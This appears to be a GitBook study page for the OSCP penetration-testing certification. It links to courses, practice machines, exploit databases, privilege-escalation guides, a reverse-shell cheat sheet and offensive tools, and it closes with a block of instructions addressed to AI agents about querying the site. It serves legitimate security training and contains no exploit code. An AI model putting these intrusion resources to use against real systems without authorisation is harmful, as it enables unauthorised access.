# OSCP- One Page Repository

#### Hello Everyone

#### This is the one page repository for OSCP learners.

### 1 Kali Linux Basic knowledge - 

* Online Course Link: <https://kali.training/lessons/introduction/>
* Book Link: <https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf>

Hands on challenge to get comfortable with Linux:

* Overthewire Bandit: <https://overthewire.org/wargames/bandit/>
* Root me <https://www.root-me.org/?lang=en>
* Cmdchallenge.com: <https://cmdchallenge.com/>
* HackerRank Linux Shell: <https://www.hackerrank.com/domains/shell>

### 2 Learn Basics Bash Scripting and Python Language

* [https://guide.bash.academy/
  ](<https://guide.bash.academy/&#xD;&#xA;>)
* <https://www.learnpython.org/>

### 3 Recon - Learn about network reconnaissance &#x20;

* Nmap Resouces

  * Nmap Official Guide - <https://nmap.org/book/toc.html>
  * &#x20;<https://www.sans.org/blog/sans-pen-test-cheat-sheet-nmap-v1-1/>
  * <https://medium.com/@infosecsanyam/nmap-cheat-sheet-nmap-scanning-types-scanning-commands-nse-scripts-868a7bd7f692>
  * <https://blog.zsec.uk/nmap-rtfm/>

* Service Enumeration
  * <https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/>

### 4 Vulnerable Machines &#x20;

Now move to vulnerable machines. There are two main websites for practice on vulnerable machines. **Hackthebox machines and Vulnhub Machines.** There are multiples infosec guys who has written blogs related to these machines for community. First thing you need to do, read blogs for 5 machine and try to understand the approach for start on these machines.

* <https://www.hackthebox.eu/login>
* <https://www.vulnhub.com/>

**TjNull has shared a list which has OSCP related boxes.**

* Below is the google sheet for vulnhub and hackthebox boxes: <https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8>

![Vulnhub List](/files/-M43yyD06-liQa0x2hly)

![Hackthebox List](/files/-M43z830X-yUQT10tKdW)

### 5 Public Exploits

Most of the time in OSCP you will need to use a public exploit on your target to see if you can obtain a shell on it. With that exploit you may need to modify shellcode or even parts of the exploit to match with your system to obtain a connection from your target.

* Exploit-DB - <https://www.exploit-db.com/>
* SearchSploit - Offline kali Database - <https://www.exploit-db.com/searchsploit>
* Packetstorm - <https://packetstormsecurity.com/files/tags/exploit/>

### 6. File Transfer

There are multiple ways to transfer the files from attacker system to target system.

* **Windows**
  * <https://sushant747.gitbooks.io/total-oscp-guide/transfering_files_to_windows.html>
  * VBS Script
  * SMB Server
  * HTTP Server
  * FTP Server
  * TFTP Server
  * Powershell
  * Debug.exe
  * Certutil
* **Linux**
  * Python Server
  * Curl
  * Wget
  * Netcat
  * FTP
  * PHP
  * SCP - SSH

### 7. Privilege Escalation

* For Practice on Local Machine:
  * <https://github.com/sagishahar/lpeworkshop>
* Windows Privilege Escalation
  * <http://www.fuzzysecurity.com/tutorials/16.html>
  * <https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/>
  * <https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/>
* Linux Privilege Escalation

  * <https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/>
  * Gtfobins - <https://gtfobins.github.io/>&#x20;

### 8. Web App Vulnerabilities

* SQL Injection - <http://pentestmonkey.net/category/cheat-sheet/sql-injection>
* Remote File Inclusion - <https://sushant747.gitbooks.io/total-oscp-guide/remote_file_inclusion.html>
* Local File Inclusion - <https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/>
* Bypass File upload - <https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf>
* Vulnerable Application for Practice
  * OWASP Juice Shop:  <https://www.owasp.org/index.php/OWASP_Juice_Shop_Project>
  * Metasploitable 2&#x20;
  * BWAPP
  * Multidae
  * DVWA - <http://www.dvwa.co.uk/>

### 9. Buffer Overflow

* Exploiting Simple Buffer Overflow on Win 32 <https://www.pentesteracademy.com/course?id=13>
* Buffer Overflow for Dummies - <https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481>
* For Practice:-
  * Windows Binaries (Recommend that you run these on Windows 7/XP 32 bit):
  * Brain Pan Machine - <https://www.vulnhub.com/entry/brainpan-1,51/>
  * Vulnserver: <https://samsclass.info/127/proj/vuln-server.htm>
  * Minishare 1.4.1: <https://www.exploit-db.com/exploits/636>
  * Savant Web Server 3.1: <https://www.exploit-db.com/exploits/10434>
  * Freefloat FTP Server 1.0: <https://www.exploit-db.com/exploits/40673>
  * Core FTP Server 1.2: <https://www.exploit-db.com/exploits/39480>
  * SLMAIL - <https://www.exploit-db.com/apps/12f1ab027e5374587e7e998c00682c5d-SLMail55_4433.exe>&#x20;
* Linux Binaries:
  * Linux Buffer Overflow: <https://samsclass.info/127/proj/lbuf1.htm>

### 10 Pivoting & Port Forwarding

* Abatchy’s Port Forwarding Guide: <https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide>
* Windows Port Forwarding: <http://woshub.com/port-forwarding-in-windows/>
* SSH Tunneling Explained: <https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/>
* Understanding Proxy Tunnels: <https://www.offensive-security.com/metasploit-unleashed/proxytunnels/>
* Explore Hidden Networks with Double Pivoting: <https://pentest.blog/explore-hidden-networks-with-double-pivoting/>
* 0xdf hacks stuff. Pivoting and Tunneling: <https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html>
* Tools:

  * SSHuttle: <https://github.com/sshuttle/sshuttle>
  * Proxychains: <https://github.com/haad/proxychains>

![](/files/-M44k0KkZHxVzVau96cd)

#### Youtube Channels for OSCP related HTB Boxes writeups

* IPPSEC TJ\_NULL OSCP LIST -<https://www.youtube.com/playlist?list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf>
* <https://www.youtube.com/watch?v=PP32yAtuMy8&list=PLYu4I0o3DfjfizB6wcSmKDIvQxJ5NXM2y>
* <https://www.youtube.com/watch?v=kWTnVBIpNsE&list=PLnPxWPfV-DjyS8PIqfYa8LT4LHH8QmunZ>
* IPPSEC - <https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA/playlists>

HTB Boxes to Prepare for OSCP (Youtube Playlist): <https://www.youtube.com/playlist?list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf><br>

### Tool Set

* **Web Recon**
  * Dirsearch: <https://github.com/maurosoria/dirsearch>
  * Dirbuster: <https://tools.kali.org/web-applications/dirbuster>
  * Gobuster: <https://github.com/OJ/gobuster>
  * Wfuzz: <https://github.com/xmendez/wfuzz>
* **SQL**
  * SQLmap: [https://github.com/sqlmapproject/sqlmap/wiki/Usag](https://github.com/sqlmapproject/sqlmap/wiki/Usage)
  * NoSQLMap: <https://github.com/codingo/NoSQLMap>
  * SQLNinja: <http://sqlninja.sourceforge.net/>
* **Windows Privilege Escalation**&#x20;
  * Winpeas&#x20;
  * Window exploit suggester - <https://github.com/GDSSecurity/Windows-Exploit-Suggester>
  * Powerup&#x20;
  * Sharpup&#x20;
  * Seatbelt&#x20;
  * Sherlock - <https://github.com/rasta-mouse/Sherlock>
  * Windows Priv checker
  * JAWS  - <https://github.com/411Hall/JAWS/commits?author=411Hall>
* **Linux Privilege Escalation**
  * Linux smart enumeration&#x20;
  * Pspy64&#x20;
  * Linenum - <https://github.com/rebootuser/LinEnum>
  * Linpeas&#x20;
  * Lpe&#x20;
  * Linux Exploit Suggester&#x20;
  * Beroot&#x20;
  * Bashark&#x20;
  * Linux priv checker
* Password Cracking
  * John  The Ripper -  <https://www.openwall.com/john/>
  * Hashcat: <https://hashcat.net/hashcat/>
  * Online Tools for Password Cracking:
    * THC Hydra: <https://github.com/vanhauser-thc/thc-hydra>
    * Medusa: <http://h.foofus.net/?page_id=51>
* Wordlist generators:
  * Cewl: <https://digi.ninja/projects/cewl.php>
  * Crunch: <https://tools.kali.org/password-attacks/crunch>
* Wordlists:
  * In Kali: /usr/share/wordlists
  * Seclists: apt-get install seclists You can find all of his password lists here: <https://github.com/danielmiessler/SecLists/tree/master/Passwords>
* Online Password Crackers:
  * <https://hashkiller.co.uk/Cracker>
  * <https://www.cmd5.org/>
  * <https://www.onlinehashcrack.com/>
  * <https://gpuhash.me/>
  * <https://crackstation.net/>

### Other OSCP guides:&#x20;

I got some content from these below OSCP guides.

* <https://sushant747.gitbooks.io/>
* <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits>
* <https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html>
* <https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html>
* <https://411hall.github.io/OSCP-Preparation>
* <https://www.gitbook.com/book/sushant747/total-oscp-guide>
* <http://0xc0ffee.io/blog/OSCP-Goldmine>
* <https://h4ck.co/oscp-journey-exam-lab-prep-tips/>
* <https://tulpa-security.com/2016/09/11/review-oscp-and-pwk/>
* <http://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/>&#x20;
* Other Links:
* <https://practicalpentestlabs.com/>
* <https://immersivelabs.co.uk/>
* <http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet>
* [https://maikthulhu.github.io/2017-11-20-onenote-layout](https://maikthulhu.github.io/2017-11-20-onenote-layout/)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://infosecsanyam261.gitbook.io/tryharder/one-page-methodology.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.